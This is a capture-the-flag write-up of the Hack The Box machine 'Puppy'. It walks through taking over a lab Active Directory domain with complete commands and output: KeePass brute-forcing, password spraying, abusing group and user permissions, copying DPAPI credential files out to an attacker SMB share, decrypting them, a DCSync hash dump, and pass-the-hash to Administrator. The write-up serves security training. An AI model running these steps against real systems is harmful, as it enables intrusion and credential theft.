Hack The Box: Puppy
Hack The Box: Puppy
Puppy is a medium-difficulty machine from Hack The Box. SMB enumeration showed readable shares –> Found KeePass database in shares –> Discovered DPAPI master key on the box –> Used master key to decrypt KeePass database –> Extracted AD user credentials from KeePass –> Identified DCSync privileges on compromised user –> Performed DCSync attack to dump domain hashes –> Used Evil-WinRM to get full control of DC
Enumeration
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
nmap 10.129.75.228 -A -v -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( [https://nmap.org](https://nmap.org/) ) at 2025-05-20 13:37 CDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:37
Completed Parallel DNS resolution of 1 host. at 13:37, 0.04s elapsed
Initiating Connect Scan at 13:37
Scanning 10.129.75.228 [1000 ports]
Discovered open port 111/tcp on 10.129.75.228
Discovered open port 53/tcp on 10.129.75.228
Discovered open port 135/tcp on 10.129.75.228
Discovered open port 139/tcp on 10.129.75.228
Discovered open port 445/tcp on 10.129.75.228
Discovered open port 3268/tcp on 10.129.75.228
Discovered open port 389/tcp on 10.129.75.228
Discovered open port 88/tcp on 10.129.75.228
Discovered open port 636/tcp on 10.129.75.228
Discovered open port 464/tcp on 10.129.75.228
Discovered open port 3260/tcp on 10.129.75.228
Discovered open port 593/tcp on 10.129.75.228
Discovered open port 2049/tcp on 10.129.75.228
Discovered open port 3269/tcp on 10.129.75.228
Completed Connect Scan at 13:37, 11.52s elapsed (1000 total ports)
Initiating Service scan at 13:37
Scanning 14 services on 10.129.75.228
Completed Service scan at 13:39, 114.20s elapsed (14 services on 1 host)
NSE: Script scanning 10.129.75.228.
Initiating NSE at 13:39
Completed NSE at 13:39, 40.12s elapsed
Initiating NSE at 13:39
Completed NSE at 13:40, 50.47s elapsed
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
Nmap scan report for 10.129.75.228
Host is up (0.068s latency).
Not shown: 986 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-21 01:39:04Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|*clock-skew: 7h01m39s
| smb2-time:
| date: 2025-05-21T01:40:53
|* start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
looks like we have these open ports:
88 (Kerberos)
135 (MSRPC)
- 139/445 (SMB)
- 389/636 (LDAP/LDAPS)
The assessment began with a known credential pair for the domain user levi.james (KingofAkron2025!), disclosed as part of the initial engagement scope
For enumeration, we utilized SMBMap to identify available SMB shares and assess the level of access permissions granted to the authenticated user.
From the picture above , there is a suspicious share called “DEV” but the problem is that we have NO ACCESS to it using these initial creds . So let’s try and fire up Bloodhound to check if there is any relations that can access the DEV share.
From the image above, we can see that our initial user “levi.james” is a member of the “HR” which got a GenericWrite on the “Developers” group. So let’s go ahead and add ourselves to this target group
1
└─$ net rpc group addmem "developers" "levi.james" -U 'PUPPY/levi.james%KingofAkron2025!' -S 10.129.75.228
Okay now that we add ourselves succesfully to the group , we can go ahead and check if we are really a member of developers group now
1
2
3
4
5
6
└─$ net rpc group members "developers" -U 'PUPPY/levi.james%KingofAkron2025!' -S 10.129.75.228
PUPPY\levi.james
PUPPY\ant.edwards
PUPPY\adam.silver
PUPPY\jamie.williams
And here we are now the output shows that we are members of “developers”.
Now i used the smbmap again and it’s showing that the “DEV” share is accessible using the same user “levi.james” . So what are we waiting for ? Let’s go ahead and access this share.
1
2
3
4
5
6
7
8
9
10
└─$ smbclient -U "levi.james" [//10.129.75.228/DEV](https://10.129.75.228/DEV)
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Mar 23 02:07:57 2025
.. D 0 Sat Mar 8 10:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 02:09:12 2025
Projects D 0 Sat Mar 8 10:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 21:25:46 2025
We just found out a KeePassXC database file (recovery.kdbx) on the share \\10.129.75.228\DEV
So the first thing that came to my mind is to crack it using the keepass2john + john
but there was an error :
1
2
└─$ keepass2john recovery.kdbx > hash.txt
! recovery.kdbx : File version '40000' is currently not supported!
my file is version 40000, which corresponds to KeePassXC 2.7+ .
So after digging in google found a github rep that got a tool to crack the file in his newest version.
https://github.com/r3nt0n/keepass4brute
I got the tool installed in my Kali linux and i used the famous wordlist rockyou.txt to crack the file password
1
2
3
4
5
6
7
8
└─$ sudo ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 36/14344392 - Attempts per minute: 113 - Estimated time remaining: 12 weeks, 4 days
[+] Current attempt: liverpool
[*] Password found: liverpool
and here we are , we have the password “liverpool” . We can open the file now to see what got there .
So here are all the creds found in this file :
1
2
3
4
5
6
7
8
9
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
JAMIE WILLIAMSON : JamieLove2025!
SAMUEL BLAKE : ILY2025!
STEVE TUCKER : Steve2025!
Okay maybe we need to do a password spraying on these passwords . But first let’s enumerate the users on this AD
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
crackmapexec smb 10.10.11.70 -u levi.james -p KingofAkron2025! --users
SMB 10.10.11.70 445 DC [+] Enumerated domain user(s)
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\jamie.williams badpwdcount: 1 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\adam.silver badpwdcount: 23 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\ant.edwards badpwdcount: 1 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\levi.james badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 10.10.11.70 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain
After trying all the possible combinations we found out that this user is working :
1
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
So let’s try and reuse Bloodhound with these creds and see if there is any relations
From the image above, we can see that our current user “ant.edwards” is a member of the “SENIOR DEVS” which got a GenericALL on the user “adam.silver” . So let’s go ahead and change the password of “adam.silver” using ant.edwards
1
─$ net rpc password "adam.silver" "NewP@ssw0rd2025" -U PUPPY/ant.edwards%Antman2025! -S dc.puppy.htb
1
2
3
4
─$ crackmapexec smb 10.10.11.70 -u "adam.silver" -p "NewP@ssw0rd2025”
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:NewP@ssw0rd2025 STATUS_ACCOUNT_DISABLED
Ok , now we have the account disabled . So let’s try to enable it using ant.edwards
1
2
3
└─$ bloodyAD --host dc.puppy.htb -d PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' remove uac 'adam.silver' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ evil-winrm -i dc.puppy.htb -u adam.silver -p 'NewP@ssw0rd2025’
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> ls
Mode LastWriteTime Length Name
---
- a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 5/30/2025 11:08 AM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> cat user.txt
facc2ef8d130a94d6d388658058b1356
Privilige Escalation Phase
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> ls
Mode LastWriteTime Length Name
---
- a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups>download site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups>
Now that we downloaded the zip file found on the Backup directory , we need to unzip it
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
└─$ unzip site-backup-2024-12-30.zip
Archive: site-backup-2024-12-30.zip
creating: puppy/
inflating: puppy/nms-auth-config.xml.bak
creating: puppy/images/
inflating: puppy/images/banner.jpg
inflating: puppy/images/jamie.jpg
inflating: puppy/images/antony.jpg
inflating: puppy/images/adam.jpg
inflating: puppy/images/Levi.jpg
creating: puppy/assets/
creating: puppy/assets/js/
inflating: puppy/assets/js/jquery.scrolly.min.js
inflating: puppy/assets/js/util.js
inflating: puppy/assets/js/breakpoints.min.js
inflating: puppy/assets/js/jquery.min.js
inflating: puppy/assets/js/main.js
inflating: puppy/assets/js/jquery.dropotron.min.js
inflating: puppy/assets/js/browser.min.js
creating: puppy/assets/webfonts/
inflating: puppy/assets/webfonts/fa-regular-400.eot
inflating: puppy/assets/webfonts/fa-solid-900.svg
inflating: puppy/assets/webfonts/fa-solid-900.ttf
inflating: puppy/assets/webfonts/fa-solid-900.woff2
inflating: puppy/assets/webfonts/fa-brands-400.svg
inflating: puppy/assets/webfonts/fa-solid-900.woff
inflating: puppy/assets/webfonts/fa-solid-900.eot
inflating: puppy/assets/webfonts/fa-regular-400.ttf
extracting: puppy/assets/webfonts/fa-regular-400.woff2
inflating: puppy/assets/webfonts/fa-regular-400.svg
inflating: puppy/assets/webfonts/fa-brands-400.eot
inflating: puppy/assets/webfonts/fa-brands-400.woff
inflating: puppy/assets/webfonts/fa-brands-400.ttf
inflating: puppy/assets/webfonts/fa-brands-400.woff2
inflating: puppy/assets/webfonts/fa-regular-400.woff
creating: puppy/assets/css/
inflating: puppy/assets/css/main.css
creating: puppy/assets/css/images/
inflating: puppy/assets/css/images/overlay.png
inflating: puppy/assets/css/images/highlight.png
inflating: puppy/assets/css/fontawesome-all.min.css
creating: puppy/assets/sass/
inflating: puppy/assets/sass/main.scss
creating: puppy/assets/sass/libs/
inflating: puppy/assets/sass/libs/_vendor.scss
inflating: puppy/assets/sass/libs/_functions.scss
inflating: puppy/assets/sass/libs/_html-grid.scss
inflating: puppy/assets/sass/libs/_vars.scss
inflating: puppy/assets/sass/libs/_breakpoints.scss
inflating: puppy/assets/sass/libs/_mixins.scss
inflating: puppy/index.html
I guess we have a suspicious file here :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>
now that we own the new credentials which is steph.cooper : ChefSteph2025! / we can go ahead and connect to this user.
We discovered DPAPI-protected credentials.
DPAPI = Data Protection API
It’s used by Windows to encrypt sensitive data.
Every user has a MasterKey, and this MasterKey is used to encrypt/decrypt the actual data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> dir C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials -h
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> dir "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect"
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\Documents>
Let’s go ahead and open the smb server on our attacker machine and copy the masterkey and the credential.
1- On Attacker machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(sanke㉿sanke)-[~/Downloads/puppy]
└─$ mkdir -p ./share
┌──(sanke㉿sanke)-[~/Downloads/puppy]
└─$ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.70,57056)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:share)
[*] Disconnecting Share(1:share)
2- On Victim machine
1
2
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" \\10.10.14.120\share\credential_blob
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" \\10.10.14.120\share\masterkey_blob
We used a known password (ChefSteph2025!) with the user SID to decrypt the MasterKey blob using the impacket-dpapi masterkey tool.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ impacket-dpapi masterkey -file masterkey_blob -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Yeyy! We have the decrypted key . Let’s go ahead and use it to decrypt the credential blobs
POV: With the MasterKey decrypted, you can decrypt all credentials protected by DPAPI for that user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ impacket-dpapi credential -file credential_blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!
New credentials aree retrieveed <3
steph.cooper_adm/FivethChipOnItsWay2025!
Like always first thing to do is upload the bloodhound data using the new creds we got
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ bloodhound-python -u steph.cooper_adm -p 'FivethChipOnItsWay2025!' -dc puppy.htb -ns 10.10.11.70 -d puppy.htb -c all
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 21 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 49S
Guess what ? I think we found a goldmine here!!
Our new user has DcSync priviliges.
We will now perofrm a a DcSync attack and extract the NTLM hash of the Administrator account.
But first guys, I wanna share something with you that maybe it will help you a lot when it comes to commands and types of attacks. It’s a mindmap that resume many things in AD.
https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
Let’s go back to our attack now. It’s easy and straight forward.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
└─$ impacket-secretsdump 'puppy.htb'/'steph.cooper_adm':'FivethChipOnItsWay2025!'@'puppy.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1..
0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z
0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.?
0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c596c0
Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf
Administrator:des-cbc-md5:20b9e03d6720150d
krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45
krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851
krbtgt:des-cbc-md5:5876d051f78faeba
PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d585a6417ec
PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f
PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8
PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac127e19f9b70fc
PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182
PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8
PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9afab118e569e6
PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726
PUPPY.HTB\adam.silver:des-cbc-md5:643d0ba43d54025e
PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc183e5a175f5fb2
PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4
PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615
PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f4c1790a11a6aa
PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e
PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b
PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468fff14f9481eccfc05ad9
PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62
PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691
DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
DC$:des-cbc-md5:7f044607a8dc9710
We have the NTLM hash of the Administrator. We are done here we can go and connect with the hash using evil-winrm .
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
└─$ evil-winrm -i 10.10.11.70 -u Administrator -H bb0edc15e49ceb4120c7bd7e6e65d75b
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/9/2025 8:25 PM CLNP
cd ..
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0aa578ded5a96f81e97c8d4eea38df50
Puppy machine pwneed !!!!! It was a great machine to be honest and i learned too much from it.
This post is licensed under CC BY 4.0 by the author.